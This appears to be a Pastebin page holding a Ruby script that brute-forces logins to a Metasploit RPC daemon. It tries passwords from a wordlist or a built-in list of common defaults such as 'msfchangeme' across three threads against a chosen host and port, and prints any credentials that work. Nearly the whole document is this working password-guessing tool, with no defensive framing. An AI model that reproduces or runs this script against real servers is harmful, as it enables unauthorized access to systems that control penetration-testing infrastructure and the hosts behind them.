Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env ruby
- #
- # MSF RPC login brute force
- #
- require 'msfrpc-client'
- require 'thread'
- MAX_THREADS = 3
- puts 'MSF RPC login brute force'
- puts '---'
- # usage
- if ARGV.length < 2
- puts "Usage: ./brute-msfrpcd.rb <host> <port> <user> <ssl> [/path/to/wordlist.txt]"
- exit 1
- end
- # parse target
- @host = ARGV[0] || '127.0.0.1'
- @port = ARGV[1] || '55552'
- @user = ARGV[2] || 'msf'
- @ssl = ARGV[3] || true
- # parse wordlist
- file = ARGV[4]
- @wordlist = []
- if file.nil?
- @wordlist = ['msf', 'password', '1234', '12345', 'msfchangeme', 'abc123', 'test', 'pass123', 'myPassword', 'msfpassword']
- puts "* No wordlist specified. Using default list (#{@wordlist.length} words)"
- else
- f = File.open(file).each_line do |line|
- @wordlist << line.chomp!
- end
- f.close
- puts "* Using wordlist '#{file}' (#{@wordlist.length} words)"
- end
- def main
- puts "* Starting MSF RPC login brute force for user '#{@user}'"
- work_queue = Queue.new
- @wordlist.each {|pass| work_queue << pass}
- workers = (0...MAX_THREADS).map do
- Thread.new do
- begin
- while pass = work_queue.pop(true)
- if login pass
- Thread.list.each do |thread|
- thread.exit unless thread == Thread.current
- end
- break
- end
- end
- rescue ThreadError
- end
- end
- end
- workers.map(&:join)
- end
- def login pass
- puts "* Trying: #{pass}"
- begin
- rpc = Msf::RPC::Client.new :host => @host,
- :port => @port,
- :user => @user,
- :pass => pass,
- :ssl => @ssl
- rescue Rex::ConnectionRefused => e
- puts '- Error: Connection refused'
- exit 1
- rescue Msf::RPC::ServerException => e
- return false if e.message =~ /Login Failed/
- puts "- Error: connection failed: #{e}"
- end
- return false if rpc.token.nil?
- puts "+ Login success: '#{@user}' : '#{pass}'"
- true
- ensure
- rpc.close rescue nil
- end
- main
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement